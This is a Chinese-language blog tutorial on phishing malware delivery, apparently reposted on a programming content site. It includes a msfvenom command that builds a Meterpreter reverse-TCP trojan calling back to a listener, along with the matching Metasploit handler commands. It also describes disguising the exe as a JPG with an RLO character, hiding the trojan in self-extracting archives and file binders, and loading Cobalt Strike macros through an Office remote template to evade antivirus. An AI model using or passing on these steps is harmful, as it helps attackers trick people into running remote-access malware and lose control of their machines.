概述
RLO伪装图片执行
利用msf生成木马x.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.96.128 LPORT=4444 -f exe -o x.exe
Metasploit 打开反向监听的命令
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
下面利用RLO对x.exe的后缀进行伪装,伪装成jpg, 把jpg反写成gpj,并点击鼠标右键
修改后效果如下图:
双击测试,成功上线。
2.伪装压缩包上线msf
同时选中木马.exe和正常文件.exe
右击鼠标选择添加到压缩文件
按照图片红色箭头进行勾选-创建自解压格式压缩文件......
最后对生成出来的压缩包利用上面的讲的RLO进行伪装
双击压缩包或解压文件尝试运行---运行成功
文件捆绑
打开文件捆绑器-选择宿主文件和捆绑的木马文件-选择图标(或自定义设置图标) -保存并重命名
点击捆绑软件,测试上线成功。
免杀对抗-office-远程模板加载上线CS
打开office创建一个模板并保存
重新创建一个word文件并插入CS生成出来的宏代码,保存时选择启用宏的Word模板,保存
然后把这个包含宏病毒的1.dotm上传到远程服务器,确保可以访问到。
下面修改这个之前保存的模板文件
改后缀为zip等压缩文件格式,点击进去
修改settings.xml.rels 修改里面的模板路径为之前上传服务器的1.docm(包含宏病毒)的文件路径。
把模板文件的后缀zip修改为原来的docx,点击打开文档,上线成功。
最后
以上就是威武荔枝为你收集整理的钓鱼篇-利用RLO隐藏exe&文件捆绑&office免杀-远程模板加载上线CS的全部内容,希望文章能够帮你解决钓鱼篇-利用RLO隐藏exe&文件捆绑&office免杀-远程模板加载上线CS所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
发表评论 取消回复